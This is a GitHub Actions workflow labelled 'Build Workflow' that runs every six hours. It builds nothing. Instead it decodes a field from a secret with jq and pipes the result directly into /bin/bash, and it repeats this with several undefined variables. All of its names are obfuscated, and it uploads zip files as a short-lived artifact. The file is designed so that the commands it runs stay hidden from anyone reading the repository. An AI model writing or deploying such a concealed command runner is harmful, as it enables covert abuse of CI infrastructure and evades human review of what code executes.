name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '51 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          x041: ${{ secrets.x041 }}
        run: |
          printf '%s' "$x041" | jq -r .zwqk44509 | /bin/bash
          echo $xtl4481 | jq -r .jao14 | /bin/bash
          echo $v38922 | jq -r .jxrx4 | /bin/bash
          printf '%s' "$ncsbe73066" | jq -r .zbg46639 | /bin/bash
          echo $clomb0 | jq -r .tko0076 | /bin/bash
          printf '%s' "$gic7" | jq -r .m490 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: uRnLdKv1
          path: "*.zip"
          retention-days: 1
